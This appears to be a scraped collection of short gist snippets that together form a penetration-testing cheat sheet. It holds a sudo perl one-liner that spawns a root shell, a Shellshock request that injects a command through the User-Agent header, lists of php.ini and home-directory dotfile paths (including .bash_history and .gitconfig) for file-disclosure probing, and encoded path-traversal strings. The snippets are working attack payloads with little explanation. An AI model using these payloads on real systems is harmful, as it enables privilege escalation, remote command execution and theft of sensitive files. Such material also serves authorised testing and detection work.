This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# sudo -l | |
SUDO PERL | |
#################################### | |
sudo perl -e "system('/bin/sh')" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Injectable: Referer:; User-Agent:; and other Headers | |
########################################################### | |
GET /script.sh HTTP/1.0 | |
Host: localhost | |
User-Agent: () { ignored;};echo -e "Content-Type: text/plain\r\n\r"; /usr/bin/id | |
########################################################### |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/etc/php.ini | |
/bin/php.ini | |
/etc/httpd/php.ini | |
/usr/lib/php.ini | |
/usr/lib/php/php.ini | |
/usr/local/etc/php.ini | |
/usr/local/lib/php.ini | |
/usr/local/php/lib/php.ini | |
/usr/local/php4/lib/php.ini | |
/usr/local/php5/lib/php.ini |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
.aptitude/config | |
.bash_config | |
.bash_history | |
.bash_logout | |
.bashrc | |
.cache/notify-osd.log | |
.config/oDesk/oDesk Team.conf | |
.cshrc | |
.gitconfig | |
.history |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Encoded Traversal Strings: | |
../ | |
..\ | |
..\/ | |
%2e%2e%2f | |
%252e%252e%252f | |
%c0%ae%c0%ae%c0%af | |
%uff0e%uff0e%u2215 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Encoded Traversal Strings: | |
../ | |
..\ | |
..\/ | |
%2e%2e%2f | |
%252e%252e%252f | |
%c0%ae%c0%ae%c0%af | |
%uff0e%uff0e%u2215 | |
%uff0e%uff0e%u2216 |
NewerOlder